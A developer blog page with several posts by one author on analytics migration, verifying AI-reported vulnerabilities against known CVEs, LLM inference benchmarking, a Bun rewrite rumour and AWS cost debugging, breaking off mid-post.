Alan West | Dev Blog on Auth, AI Tools and Code

Migrating Off Google Analytics: Umami vs Plausible vs Fathom

Alan West — Tue, 12 May 2026 03:18:44 GMT

The wake-up call I didn't ask for

Last week the TanStack folks reported what appears to be a compromise affecting some of their npm packages (the details are still being sorted out in issue #7383; read it yourself before drawing conclusions). I won't rehash the postmortem here. What I want to talk about is the gut-punch feeling I had reading it.

I run npm install every day. I've barely thought about which third-party scripts are loading in production. And one of the worst offenders sitting in nearly every site I've ever shipped? Analytics.

So this post is about something I've been chewing on for months but finally moved on: ripping Google Analytics out of three side projects and picking a privacy-focused alternative. Specifically, I'll compare Umami, Plausible, and Fathom — the three I actually evaluated — and walk through the migration steps that worked for me.

Why even migrate?

A few honest reasons, none of them ideological:

Script weight. GA4's gtag.js is heavy. The privacy-focused tools are typically 1–2 KB.
Cookie banners. No cookies = no consent banner in most jurisdictions. Fewer modals = fewer bounces.
Vendor trust. After watching a supply chain story unfold in real time, having fewer third-party scripts feels less reckless.
Self-hosting option. If I can run it on my own infra, I control the script.

If you genuinely need Google's audience features (remarketing, conversion linking to Google Ads), this post probably isn't for you. Stay where you are.

The contenders

Plausible

Open source (AGPL), GDPR/CCPA compliant, cloud or self-hosted. The script is small — the docs claim under 1 KB. Written in Elixir. Cloud plans are subscription-based.

Fathom

Privacy-focused, cloud-only since they pivoted from the original open source v1 ("Fathom Lite," archived) to a commercial closed-source product. I evaluated the commercial product.

Umami

Open source (MIT), self-hosted by default with a hosted cloud option on umami.is. Built on Next.js, runs on PostgreSQL or MySQL. Free if you host it yourself. Easy enough that I had it running in an evening.

Side-by-side

I'll keep this honest — I ran all three on the same site for two weeks before deciding.

Feature	Plausible	Fathom	Umami
Open source	Yes (AGPL)	No (closed)	Yes (MIT)
Self-host	Yes	No	Yes (primary path)
Cookies	No	No	No
GDPR	Yes	Yes	Yes
Cloud option	Paid	Paid	Free tier + paid
Script size	~1 KB	~2 KB	~2 KB
Funnels / goals	Yes	Yes	Yes (basic)

The sizes above match what I observed in the network tab, but check each vendor's docs before quoting them anywhere serious.

What the snippets look like

Replacing GA is mostly about swapping a script tag. Here's the before:


<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXX"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-XXXXXX'); // sends pageview + sets cookies
</script>

And the replacements:


<!-- Plausible -->
<script defer data-domain="example.com"
        src="https://plausible.io/js/script.js"></script>

<!-- Fathom -->
<script src="https://cdn.usefathom.com/script.js"
        data-site="ABCDEFG" defer></script>

<!-- Umami (self-hosted) -->
<script defer src="https://analytics.mydomain.com/script.js"
        data-website-id="your-website-id"></script>

That's it. No dataLayer. No consent banner gate. The script loads once, sends a single beacon per pageview, and stops bothering you.

Custom events

The thing I almost forgot when migrating: GA's gtag('event', ...) calls. Here's how I rewrote them for Umami (the APIs are similar across the three, but each has its own conventions):

// Before (GA4)
gtag('event', 'signup_completed', {
  plan: 'pro',
  source: 'pricing_page'
});

// After (Umami)
// `umami` is attached to window by the loader script
window.umami?.track('signup_completed', {
  plan: 'pro',
  source: 'pricing_page'
});

Plausible uses window.plausible('signup_completed', { props: { plan: 'pro' } }). Fathom uses fathom.trackEvent('signup_completed'). Don't do a global find-and-replace — the property conventions differ enough that you'll want to read each vendor's docs first.

Self-hosting Umami in five minutes

This is the part that sold me. Here's the docker-compose.yml running on the VPS for one of my side projects:

services:
  umami:
    image: ghcr.io/umami-software/umami:postgresql-latest
    ports:
      - "3000:3000"
    environment:
      DATABASE_URL: postgresql://umami:umami@db:5432/umami
      DATABASE_TYPE: postgresql
      APP_SECRET: change-me-to-a-real-secret # rotate this
    depends_on:
      db:
        condition: service_healthy

  db:
    image: postgres:15-alpine
    environment:
      POSTGRES_DB: umami
      POSTGRES_USER: umami
      POSTGRES_PASSWORD: umami
    volumes:
      - umami-db:/var/lib/postgresql/data
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U umami"]

volumes:
  umami-db:

Run it behind Caddy or Nginx, point a subdomain at it, drop the script tag into your site. You own the data. Nothing leaves your server. The dashboard is genuinely pleasant — the Next.js UI loads fast and shows the things I actually look at.

Migration steps that worked

No magic, just mechanical:

Inventory your GA calls. Grep your codebase for gtag(, dataLayer, and any analytics wrapper functions. Write them down.
Pick your destination. Zero ongoing cost and own your data → self-hosted Umami. Don't want to run Postgres → Plausible Cloud. Want the most polished commercial dashboard → Fathom.
Run them in parallel for a week. Drop the new script alongside GA. Compare daily pageview counts. You'll see drift — the privacy-focused tools usually report fewer visits because they don't fingerprint, and that's kind of the point.
Rewrite custom events. Map each gtag('event', ...) to the new API. Wrap them in a helper so you can switch again later without grepping.
Remove the GA script and the cookie banner. This is the satisfying part.
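
The inventory step above can be scripted instead of grepped by hand. What follows is a minimal sketch, not a finished tool: the function name `find_ga_calls`, the suffix list, and the decision to skip `node_modules` are my own assumptions, and the pattern only covers the two strings named in the step (`gtag(` and `dataLayer`), so add your own wrapper names.

```python
import re
from pathlib import Path

# The two strings named in the inventory step; add your own wrapper names here.
GA_PATTERN = re.compile(r"gtag\(|dataLayer")
# Hypothetical default: the file types where tracking calls usually live.
SOURCE_SUFFIXES = (".js", ".jsx", ".ts", ".tsx", ".html")

def find_ga_calls(root):
    """Return (path, line_number, line) for every source line that mentions GA."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        # Skip vendored dependencies and anything that is not a source file.
        if "node_modules" in path.parts or path.suffix not in SOURCE_SUFFIXES:
            continue
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        for number, line in enumerate(text.splitlines(), start=1):
            if GA_PATTERN.search(line):
                hits.append((str(path), number, line.strip()))
    return hits
```

Calling `find_ga_calls("src")` and printing each tuple gives you the written-down list the step asks for, and the same list doubles as a checklist when you rewrite custom events.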

My recommendation

Honestly? Here's how I'd choose:

Side projects, solo devs: Self-hosted Umami. Free, simple, MIT-licensed.
Small business, no ops appetite: Plausible Cloud. Easiest onboarding, still open source if you ever want to migrate off.
Polished dashboards for clients: Fathom. The UX feels the most "finished" of the three.

I'm not saying Google Analytics is bad — it's free, it's powerful, and it's still the right answer if you live inside their ad ecosystem. But for the rest of us, three lines of script and a Postgres container will get you 90% of what you actually look at, with one less third-party domain in your Content-Security-Policy.

The TanStack situation reminded me that every script tag is a trust decision. Make fewer trust decisions.

How to verify AI-discovered vulnerabilities aren't just training data echoes

Alan West — Tue, 12 May 2026 01:21:30 GMT

The setup

Last month a friend DM'd me a screenshot. An AI security agent had "discovered" a vulnerability in a popular open-source project. The agent walked through exploitation steps, suggested a patch, the whole nine yards. Looked legit.

Then someone pointed out the CVE ID it kept almost-quoting was from years earlier.

This is going to keep happening. As we wire LLMs into vulnerability research workflows, we run into a problem that doesn't have a clean analogue in traditional static analysis: the tool you're using may have already seen the answer in its training data, and it cannot reliably tell you which findings came from reasoning and which came from memory.

I've spent the last few months adding AI-assisted triage to a security workflow at a contracting gig. Here's what I've learned about not getting fooled.

Why this happens (the root cause)

LLMs train on whatever crawlable text is on the open internet. That includes:

The full NVD database
GitHub Security Advisories
CVE writeups on blogs
Bug bounty disclosures (after the embargo lifts)
Mailing list archives (oss-security, full-disclosure, etc.)
Project changelogs and commit messages

If a CVE was disclosed before a model's training cutoff, the model has very likely seen a description of the bug, the patch, and probably someone's analysis of it. When you point that same model at the vulnerable file, it isn't always finding the bug — sometimes it's recognizing it.

The tricky part: the model usually can't tell you which is which. It generates the same confident output either way. There's no internal flag for "I retrieved this from memory" versus "I derived this from the code in front of me."

This is the same phenomenon that makes benchmark scores unreliable once the questions leak: if the benchmark made it into training, the model "solves" it by recall. The security version just has higher stakes.

The validation workflow

Here's the rough process I run on any AI-flagged finding before it gets escalated. None of this is exotic — it's stuff I wish I'd been doing from day one.

Step 1: Check the public databases first

Before you trust any finding, fuzzy-match the bug fingerprint against known CVEs. The NVD publishes JSON data feeds you can pull locally:

import json
from difflib import SequenceMatcher
from pathlib import Path

# NVD yearly feeds: https://nvd.nist.gov/vuln/data-feeds
def load_nvd_feed(year: int) -> list[dict]:
    path = Path(f"nvdcve-1.1-{year}.json")
    return json.loads(path.read_text())["CVE_Items"]

def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def find_matches(ai_description: str, package: str, threshold: float = 0.55):
    matches = []
    for year in range(2010, 2027):
        for item in load_nvd_feed(year):
            desc = item["cve"]["description"]["description_data"][0]["value"]
            # Cheap pre-filter: only compare CVEs that mention the package
            if package.lower() not in desc.lower():
                continue
            score = similarity(ai_description, desc)
            if score >= threshold:
                matches.append((score, item["cve"]["CVE_data_meta"]["ID"], desc))
    return sorted(matches, reverse=True)

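# ai_finding is the model's free-text description of the bug (placeholder text here)
ai_finding = "heap buffer overflow when parsing a crafted certificate"
hits = find_matches(ai_finding, package="openssl")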
for score, cve_id, desc in hits[:5]:
    print(f"{score:.2f}  {cve_id}: {desc[:120]}...")

If you get a hit above ~0.6 similarity, your "discovery" is almost certainly a memorized CVE; the 0.55 default threshold sits slightly below that so borderline matches still show up for manual review. SequenceMatcher is dumb, but it catches the obvious cases. For better recall, use sentence embeddings (the sentence-transformers library works fine), but start with the dumb thing because it's faster to debug.

Step 2: Check the timeline

Git history doesn't lie. If the model says "this buffer overflow in parse_packet," run git blame on the offending lines, then walk the file's history to see what it looked like at different points in time:

# When was the suspect line introduced?
git log --all --follow -p -- path/to/file.c | head -200

# Did a security fix already land near this code?
git log --all --source --remotes --grep="security\|CVE" \
    -- path/to/file.c

If a fix landed for this exact code path years ago and the model is "discovering" it against modern source, you've already got your answer. Either the bug is fixed (and the model is recalling the pre-fix version), or there's a regression — which is worth knowing either way, but it's not a novel discovery.

Step 3: Force the model to reason from scratch

Here's a trick that's saved me a lot of time. Run the analysis again with the package name and obvious identifiers redacted. Replace function names with hashes:

import re
import hashlib

def anonymize(source: str, package: str) -> str:
    # Strip package name and CVE-ish identifiers the model could pattern-match on
    # re.escape keeps names like "libfoo++" from being read as regex syntax
    source = re.sub(rf"\b{re.escape(package)}\b", "PACKAGE_X", source, flags=re.I)
    source = re.sub(r"CVE-\d{4}-\d+", "CVE-REDACTED", source)

    # Hash long identifiers so memorized function names don't trigger recall
    def hash_ident(m: re.Match) -> str:
        return "fn_" + hashlib.sha256(m.group(0).encode()).hexdigest()[:8]

    return re.sub(r"\b[a-z_][a-z0-9_]{6,}\b", hash_ident, source)

If the model still flags the same vulnerability class on the anonymized code, the finding is probably grounded in the code in front of it. If it suddenly can't find anything, you were getting recall.

This isn't bulletproof — distinctive code structure can still trigger memory — but it filters out a lot of noise. I haven't tested this thoroughly against every model family, so calibrate your threshold against findings you already know the answer to.

Prevention: building this into your workflow

A few habits that have stuck:

Treat AI findings as leads, not conclusions. Same as a static analyzer warning. You wouldn't ship a fix for a gosec G104 without reading the code; don't ship one for an LLM finding either.
Note the model's training cutoff in the report. Any CVE disclosed before that date is suspect by default.
Cross-check against multiple sources. NVD, GitHub Advisory DB, the project's own security page (for FreeBSD that's freebsd.org/security).
Require a working PoC before triaging as P1. If the model can't produce a reproducer that actually runs against the current code, the finding is theoretical at best.
Log the prompt and full output. When you eventually find out a "discovery" was a memory hit, you want to know what the prompt looked like so you can adjust.
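
The training-cutoff habit from the list above is easy to automate once you have publication dates for the CVEs your fuzzy match returned. This is a minimal sketch under stated assumptions: `label_by_cutoff` is a name I made up, the CVE IDs in the usage note are placeholders rather than real entries, and the cutoff date is whatever the model vendor publishes (which is often approximate).

```python
from datetime import date

def label_by_cutoff(published, training_cutoff):
    """Label each CVE 'suspect' if it was public on or before the model's cutoff.

    published: dict mapping CVE ID -> publication date
    training_cutoff: the model's stated training cutoff (treat as approximate)
    """
    return {
        cve_id: "suspect" if day <= training_cutoff else "after-cutoff"
        for cve_id, day in published.items()
    }
```

For example, `label_by_cutoff({"CVE-PLACEHOLDER-1": date(2022, 3, 1)}, date(2024, 6, 1))` marks the entry as suspect. An "after-cutoff" label does not prove the finding is novel; it only means this particular recall path is less likely.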

The uncomfortable truth

Even when an AI tool does genuinely identify a real bug, you usually can't tell from the output alone whether it reasoned its way there or got lucky with memorization. That isn't a bug in any specific tool — it's a property of how these models work. The validation step isn't optional and it isn't going away.

The good news is that the validation is straightforward. The bad news is that I keep meeting teams who skip it because the AI sounded confident.

Don't skip it.

TokenSpeed and the Quiet Race to Make LLM Inference Boring

Alan West — Mon, 11 May 2026 16:56:57 GMT

Another inference engine?

So TokenSpeed is trending on GitHub this week, billing itself as a "speed-of-light LLM inference engine." I clicked through expecting either a vLLM clone or another Rust rewrite of llama.cpp. I haven't run it in production yet — the repo is fresh and I want to be honest about that up front — but the framing alone is worth talking about, because it points at a shift I've been watching for a while.

The last two years of inference work have been a sprint. PagedAttention landed in vLLM. Continuous batching went from research paper to default behavior. FlashAttention-2 and -3 showed up everywhere. We've gone from "can you even serve a 13B model" to "can you saturate your H100s." TokenSpeed is part of a wave that's stopped trying to invent new tricks and started trying to make the existing ones cheap, predictable, and operable.

That's a less exciting story than "we made inference 10x faster," but it's the one that actually matters if you're shipping.

What "speed of light" really means

The phrase gets tossed around loosely, so let me be precise. In inference, the speed-of-light bound for decoding is roughly:

tokens/sec ≤ memory_bandwidth / model_weights_size

For a 7B model in fp16 (~14GB of weights) on an H100 with ~3TB/s HBM bandwidth, the theoretical ceiling is around 200 tokens/sec for a single sequence. Real engines get somewhere between 30% and 80% of that depending on what tricks they pull. "Speed of light" inference means you're memory-bound, not compute-bound, and you're squeezing every last bit out of that bandwidth.
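
To make the arithmetic behind that ceiling explicit, here is a small sketch. The function name is mine, and the model deliberately ignores KV cache reads, activations, and batching, so it is an upper bound for single-sequence decoding rather than a prediction.

```python
def decode_ceiling_tokens_per_sec(params_billions, bytes_per_param, bandwidth_tb_s):
    """Upper bound on single-sequence decode rate when weights are read once per token."""
    weights_bytes = params_billions * 1e9 * bytes_per_param
    bandwidth_bytes_per_sec = bandwidth_tb_s * 1e12
    return bandwidth_bytes_per_sec / weights_bytes

# The example from the text: 7B parameters, fp16 (2 bytes each), ~3 TB/s of HBM bandwidth.
ceiling = decode_ceiling_tokens_per_sec(7, 2, 3.0)
print(f"ceiling: {ceiling:.0f} tokens/sec")                                  # ceiling: 214 tokens/sec
print(f"30%-80% band: {0.3 * ceiling:.0f}-{0.8 * ceiling:.0f} tokens/sec")   # 30%-80% band: 64-171 tokens/sec
```

Plug in your own model size, precision, and GPU bandwidth before reading anyone's benchmark chart; if a claimed single-sequence number lands above the ceiling, something other than plain decoding is being measured.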

I'm not going to claim TokenSpeed actually hits this — I haven't benchmarked it, and I'd be skeptical of anyone who makes that claim without showing a reproducible harness. But the goal is the right goal. If you want to evaluate an inference engine, this is the math you should bring with you.

A practical benchmark you can actually run

When I'm comparing inference engines for a project, I don't trust marketing graphs. I run something boring like this against each candidate:

import time
import requests
import statistics

# Hit a local OpenAI-compatible endpoint exposed by your engine
ENDPOINT = "http://localhost:8000/v1/chat/completions"

def measure_ttft_and_tps(prompt, max_tokens=256):
    start = time.perf_counter()
    first_token_time = None
    token_count = 0

    # streaming so we can capture time-to-first-token accurately
    with requests.post(ENDPOINT, json={
        "model": "local",
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": max_tokens,
        "stream": True,
    }, stream=True) as r:
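        for line in r.iter_lines():
            if not line or not line.startswith(b"data: "):
                continue
            # the stream ends with a "data: [DONE]" sentinel, which is not a token
            if line == b"data: [DONE]":
                continue
            if first_token_time is None:
                first_token_time = time.perf_counter()
            # approximation: counts each streamed chunk as one token
            token_count += 1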

    end = time.perf_counter()
    ttft = first_token_time - start
    # decode rate excludes prefill, which is the number that matters for UX
    tps = (token_count - 1) / (end - first_token_time)
    return ttft, tps

prompts = ["Explain quicksort."] * 20
results = [measure_ttft_and_tps(p) for p in prompts]
ttfts, tpss = zip(*results)

print(f"TTFT p50: {statistics.median(ttfts)*1000:.0f}ms")
print(f"TTFT p95: {sorted(ttfts)[int(len(ttfts)*0.95)]*1000:.0f}ms")
print(f"Decode tokens/sec p50: {statistics.median(tpss):.1f}")

Two numbers matter: time-to-first-token (TTFT) and steady-state decode rate. TTFT is dominated by prefill and request queueing — it's what your user feels when they hit submit. Decode rate is what determines whether your bill is sustainable.

I ran into a situation last year where an engine looked great on average throughput but had a TTFT p95 that was 4x worse than a "slower" alternative. Under load, the second engine felt faster to users even though it generated fewer tokens per second per request. Aggregate throughput is the wrong metric if you only ever look at the mean.
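
Here is a toy illustration of how a mean can hide that kind of tail. The latency samples are invented for the example and do not come from any real engine; `percentile` is a plain nearest-rank helper I wrote for this sketch.

```python
import statistics

def percentile(values, pct):
    """Nearest-rank percentile for an integer pct between 1 and 100."""
    ordered = sorted(values)
    # Ceiling division keeps the rank an exact integer (no float rounding).
    rank = max(1, -(-pct * len(ordered) // 100))
    return ordered[rank - 1]

# Hypothetical TTFT samples in milliseconds, invented for illustration.
engine_a = [50] * 18 + [400, 600]  # quick most of the time, ugly tail
engine_b = [100] * 20              # slower but steady

for name, samples in (("A", engine_a), ("B", engine_b)):
    print(name, "mean:", statistics.mean(samples), "p95:", percentile(samples, 95))
```

Engine A wins on the mean (95 ms against 100 ms) while its p95 is four times worse (400 ms against 100 ms), which is the shape of the problem described above.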

Where TokenSpeed fits (tentatively)

Looking at the repo, TokenSpeed appears to be aiming at the same niche as vLLM, TGI, SGLang, and TensorRT-LLM: high-throughput batched serving with an OpenAI-compatible API surface. According to the README it leans on the standard playbook: paged KV cache, continuous batching, and some form of speculative decoding. I want to stress that I'm describing what the README says, not what I've personally verified.

My honest take on this category:

vLLM is the default. Big community, fast-moving, supports almost every model that matters. It's what I reach for unless I have a specific reason not to.
TGI is fine if you're already in the Hugging Face ecosystem.
SGLang is genuinely interesting for structured generation and complex prompting patterns.
TensorRT-LLM wins on raw H100/H200 throughput if you can stomach the build complexity.
llama.cpp is still the right answer for CPU, Apple Silicon, and edge deployments.

A new entrant has to do something specific better, or it's just another README. I'll be watching to see what TokenSpeed's specific edge actually is once people run real benchmarks. The trending chart isn't a benchmark.

The operational stuff nobody talks about

The thing I've learned the hard way: inference engine choice matters less than how you operate the thing. A few patterns that have saved me real money:

Pin your model versions in the deployment manifest, not in code. Roll forward via deployment, not via app release.
Separate prefill-heavy and decode-heavy traffic onto different replicas if you can. Long-context summarization and chat have very different shapes; mixing them in one pool hurts both.
Cap max_tokens aggressively at the gateway. A single runaway request can starve a whole replica's KV cache budget.
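
The max_tokens cap from the list above can be a few lines in whatever sits in front of the engine. A minimal sketch, assuming an OpenAI-style request body already parsed into a dict; the cap value and the name `clamp_request` are hypothetical, so pick a ceiling that fits your own KV cache budget.

```python
MAX_TOKENS_CAP = 1024  # hypothetical ceiling, not a recommendation

def clamp_request(body, cap=MAX_TOKENS_CAP):
    """Return a copy of the request body with max_tokens bounded by cap.

    Missing, non-integer, or non-positive values are replaced by the cap so
    the engine never sees an unbounded request.
    """
    clamped = dict(body)  # shallow copy; the caller's dict is left untouched
    requested = clamped.get("max_tokens")
    if not isinstance(requested, int) or requested <= 0 or requested > cap:
        clamped["max_tokens"] = cap
    return clamped
```

Doing this at the gateway rather than in each client means one misbehaving caller can't opt out of the limit.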

For observability, you want request-level metrics (TTFT, decode TPS, queue depth, cache utilization) flowing somewhere you can actually query. I usually pipe inference metrics to Prometheus and frontend analytics through something privacy-respecting. Privacy-focused options like Umami or Plausible give you full data ownership without dragging your users through GDPR consent gymnastics, which matters a lot for the LLM tools I've shipped to European clients.

Should you switch?

Probably not yet. If you're already running vLLM in production and it's meeting your SLOs, the cost of swapping is real: new failure modes, new tuning knobs, new metrics dashboards. The cost of staying is just continuing to pay attention.

What I'd actually do with TokenSpeed today:

Clone it on a dev box.
Run the benchmark above against your real workload mix (not the README's prompt set).
Compare numbers honestly, including p95 and p99, not just the mean.
If it's meaningfully better — say, >20% on the metric that's actually your bottleneck — file a ticket to revisit in three months when the project has had a chance to settle.

Fresh inference engines are exciting, but "fresh" and "production-ready" are different things. The honest move is to bookmark this, check back when 0.x becomes 1.x, and let the early adopters find the segfaults.

The official repo is at github.com/lightseekorg/tokenspeed if you want to follow along. For context on the broader category, the vLLM docs and the original PagedAttention paper are still the best place to build intuition for why any of this works at all.

Bun, Zig, and Rust: What the Rewrite Rumor Means for Your Stack

Alan West — Mon, 11 May 2026 15:11:00 GMT

A surprising headline (with caveats)

Last week a tweet from Jarred Sumner, Bun's creator, made the rounds claiming a Zig-to-Rust rewrite is passing 99.8% of the test suite. I haven't been able to independently verify this through Bun's official release notes or the changelog at bun.sh, so take the specifics with a grain of salt. According to early reports it's a real effort, but I'd treat the exact percentage as anecdotal until something hits the official channels.

The conversation it kicked up on Reddit and HN is still worth digging into. It surfaces a question I've been chewing on for years: when does it actually make sense to rewrite a working systems project in a different language? I've migrated three production services between languages over the last few years (Go to Rust twice, Node to Bun once), so let me walk through what a Bun rewrite would mean — and use it as a lens for the broader Zig vs Rust comparison.

Why anyone rewrites in the first place

Rewrites are almost always a bad idea. Joel Spolsky wrote about this 25 years ago and it hasn't aged a day. The reasons people do them anyway tend to fall into three buckets:

Hiring: the original language has a shallow talent pool
Tooling: the ecosystem doesn't give you what you need (debuggers, profilers, libraries)
Compiler guarantees: you're hitting bugs the type system could've caught

For Bun, the rumored rationale leans on the third one. Zig is phenomenally productive for this kind of work — I've used it for a small parser project and the comptime story is genuinely magical — but its lack of borrow-checker-style memory safety guarantees makes a multi-megabyte runtime a scary place to live long-term.

Zig vs Rust: a side-by-side

Let me show what idiomatic equivalents look like. Here's a tiny string-handling snippet in Zig:

const std = @import("std");

pub fn greet(allocator: std.mem.Allocator, name: []const u8) ![]u8 {
    // Explicit allocator, explicit error union via the leading !
    return std.fmt.allocPrint(allocator, "Hello, {s}!", .{name});
}

And the Rust equivalent:

// Allocation goes through the standard library's String
// Ownership is checked at compile time, no manual allocator needed here
pub fn greet(name: &str) -> String {
    format!("Hello, {name}!")
}

The Rust version is shorter, but that's not the real story. The real story is what the compilers will and won't catch for you:

Zig: explicit allocators, explicit error sets, no hidden control flow. You get speed and clarity. You don't get memory-safety guarantees.
Rust: the borrow checker enforces aliasing and lifetime rules at compile time. Slower to write, harder to learn, but use-after-free and data races become much harder to ship.

For a JavaScript runtime that ingests untrusted code, that distinction matters a lot.

The migration math

If Bun's team really pulled this off, the scale is staggering. We're talking on the order of hundreds of thousands of lines of Zig translated: bundler, package manager, transpiler, the JavaScriptCore glue, the test runner. "99.8% of the test suite passing" sounds great until you realize 0.2% of a six-digit test suite is still a lot of broken edge cases: at 100,000 tests, that's 200 failures.

I went through a much smaller version of this when I moved a Go service to Rust last year. Things I underestimated:

Test ports that look fine but quietly assume different concurrency primitives
Allocator behavior changes that only surface under sustained load
FFI boundaries — Bun in particular has a giant surface to JavaScriptCore

If you're considering a similar rewrite at your company, the rule I've learned the hard way: budget 3-5x your initial estimate, then add another 50%.
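
Spelled out as arithmetic, that rule of thumb compounds to roughly 4.5x to 7.5x the original number. A tiny sketch, with a hypothetical 8-week starting estimate:

```python
def rewrite_budget(initial_estimate_weeks):
    """Apply the 3-5x multiplier, then add 50% on top of each end of the range."""
    low = initial_estimate_weeks * 3 * 1.5
    high = initial_estimate_weeks * 5 * 1.5
    return low, high

low, high = rewrite_budget(8)  # hypothetical 8-week initial estimate
print(f"plan for {low:.0f} to {high:.0f} weeks")  # plan for 36 to 60 weeks
```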

Migration steps, if you were doing this yourself

Let's say you have a smaller Zig project and you're tempted to follow Bun's lead. Here's the rough order I'd go in:

Pick a leaf module first. Something with no dependents, ideally pure logic. Translate it, write a parity test against the Zig version, and run them side by side.
Use a thin C ABI bridge. Both Zig and Rust can export and call functions over the C ABI (extern "C" in Rust, export and extern declarations in Zig). Translate one module at a time and call across the boundary while you migrate.
Move the allocator strategy explicitly. Rust's default global allocator behaves differently from a Zig arena. Decide upfront whether you're using bumpalo, a custom allocator, or just Box/Vec everywhere.
Port the tests last, then write them again. Run the original Zig tests through the Rust API, then write Rust-native ones. The two suites catch different bugs.

What about the rest of us?

For most of us writing application code, this debate is academic. You probably won't notice if Bun underneath is Zig or Rust — you care about install times, hot reload, and whether bun test survives your monorepo (it does, mostly).

Where it does matter is ecosystem implications:

Plugin authors might have to adapt if internal APIs shift
Native module authors could get a friendlier extension story under Rust's tooling
Build times for contributing to Bun itself would shift, in either direction

A side note on monitoring your Bun apps

While we're on tooling: if you're running a Bun app in production and want to track usage without dragging in a heavyweight analytics SaaS, the privacy-focused options are worth a look. I've used Plausible, Fathom, and most recently Umami on personal projects.

Quick rundown:

Plausible: hosted or self-hosted, GDPR-compliant by default, simple dashboard. Pricing on the hosted plan is page-view based.
Fathom: hosted only, also privacy-focused, slightly nicer UI in my opinion. No self-host option.
Umami: open source, self-hostable on a basic Postgres or MySQL stack, no cookies, GDPR-compliant out of the box. Free if you run it yourself.

I currently host Umami on a small Hetzner box for my dev blog. The integration is one tag:

<script
  defer
  src="https://your-umami-instance.com/script.js"
  data-website-id="your-id-here"
></script>

That's it. No cookie banner required, no per-visit charges, and it pairs nicely with a Bun- or Node-based site because it doesn't care what runtime serves the page.

If you're doing auth on the same project, Authon is what I'm using on a side project right now — it's a hosted service (self-hosting is on the roadmap but not available yet), the free plan has unlimited users with no per-user pricing, and they support 10+ OAuth providers. I won't go deeper than that here, just noting it as another piece of the indie-dev stack that fits this same "small server, no surprises" vibe.

My take

If the rewrite report is accurate, I'd guess we're 12-18 months out from a stable, public Rust-based Bun. Until I see something on the official changelog, though, I'm treating it as a strong rumor rather than a roadmap commitment.

What I would actually do today:

If you're already on Bun, keep using it. Nothing changes for application authors.
If you're starting a new systems project, Rust still has a more mature crate ecosystem and a larger talent pool. Zig is more fun to write but the safety story matters at scale.
If you're picking a low-level language to learn for 2026, learn Rust first, then dabble in Zig once you understand low-level memory work — they reinforce each other better in that order.

Rewrites are romantic. Most should not happen. The interesting ones — the ones we actually learn from — are the ones where the team already shipped something great in the first language and is rewriting because they hit a ceiling, not because they got bored. That's the bar I'd hold any "rewrite the runtime" rumor to.

Why your AWS bill exploded overnight and how to actually fix it

Alan West — Mon, 11 May 2026 15:02:49 GMT

The 3 AM Slack message every developer dreads

Last month I got pinged at 3 AM because our cloud bill had tripled in 24 hours. No new deployments. No traffic spike. Just a number that climbed while everyone slept.

If you've spent any time on a major cloud platform, you've probably been here. The dashboard shows green, the app runs fine, but somewhere a service is quietly burning money. After debugging this on three different projects in the last year, I've found the patterns are almost always the same.

Let me walk you through how I track these down and what I do to prevent them.

The root cause is almost never what you think

Here's the frustrating truth: surprise cloud bills are rarely from the obvious culprits. It's not your main compute instances. It's not your database. Those costs are predictable.

The real killers are usually one of these:

NAT gateway data transfer — every byte through a NAT costs money, and chatty services rack this up fast
Cross-AZ traffic — services in different availability zones talking to each other constantly
Unused load balancers and elastic IPs — they keep billing even when nothing uses them
Log ingestion — debug logging left on in production, multiplied by millions of requests
Snapshot retention — old EBS snapshots accumulating for years

The pattern I see most often? A misconfigured service inside a private subnet pulling gigabytes through a NAT gateway because someone forgot to set up a VPC endpoint.

Step 1: Find what changed

Before touching anything, figure out what's different. I always start with billing data grouped by service and usage type.

If you're using the AWS CLI, the Cost Explorer API is your friend:

aws ce get-cost-and-usage \
  --time-period Start=2026-05-01,End=2026-05-11 \
  --granularity DAILY \
  --metrics UnblendedCost \
  --group-by Type=DIMENSION,Key=USAGE_TYPE

The USAGE_TYPE grouping is the key. SERVICE will tell you EC2 is expensive — well, no kidding. But USAGE_TYPE will tell you it's specifically DataTransfer-Regional-Bytes or NatGateway-Bytes, which actually points you somewhere.

Once you know the usage type, you can dig deeper. For NAT gateway issues, VPC Flow Logs will show you exactly which instances are responsible.
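
The JSON that Cost Explorer returns is easier to read once it is ranked by how much each usage type grew. This is a rough sketch, assuming you saved the CLI output to a file; the function names and the file name `costs.json` are mine. It relies on the `ResultsByTime`, `Groups`, `Keys`, and `Metrics.UnblendedCost.Amount` fields of the response.

```python
import json
from collections import defaultdict

def load_response(path):
    """Load a saved get-cost-and-usage response, e.g. costs.json (hypothetical name)."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)

def daily_cost_by_usage_type(response):
    """Map each usage type to its list of daily costs, in the order returned."""
    days = response["ResultsByTime"]
    series = defaultdict(lambda: [0.0] * len(days))
    for index, day in enumerate(days):
        for group in day.get("Groups", []):
            usage_type = group["Keys"][0]
            # Amount arrives as a string in the API response.
            series[usage_type][index] = float(group["Metrics"]["UnblendedCost"]["Amount"])
    return dict(series)

def biggest_jumps(series, top=5):
    """Rank usage types by the cost increase between the first and last day."""
    deltas = [(costs[-1] - costs[0], usage_type) for usage_type, costs in series.items()]
    return sorted(deltas, reverse=True)[:top]
```

Running `biggest_jumps(daily_cost_by_usage_type(load_response("costs.json")))` puts the usage type that grew the most at the top, which is usually where to start digging. Comparing only the first and last day is a simplification; a spike in the middle of the window needs a per-day look.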

Step 2: Trace the traffic

This is where most people get stuck. You know NAT traffic is high, but which service is causing it?

Enable VPC Flow Logs to CloudWatch or S3, then query them. Here's an Athena query I've used a dozen times:

SELECT srcaddr, dstaddr, SUM(bytes) AS total_bytes
FROM vpc_flow_logs
WHERE day BETWEEN '2026/05/01' AND '2026/05/10'
  -- Filter to traffic going through the NAT
  AND action = 'ACCEPT'
  AND dstport IN (443, 80)
GROUP BY srcaddr, dstaddr
ORDER BY total_bytes DESC
LIMIT 50;

The top results almost always tell the story. Last week this query showed me one ECS task pulling 400GB from S3 through the NAT gateway every day. Through the NAT. To get to S3. In the same region.

That's the kind of thing that hides for months until someone audits it.
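To put a rough number on it, here's the back-of-envelope math. The $0.045 per GB NAT processing rate is my assumption for illustration, not a quoted price; check current pricing for your region before using the result.

```python
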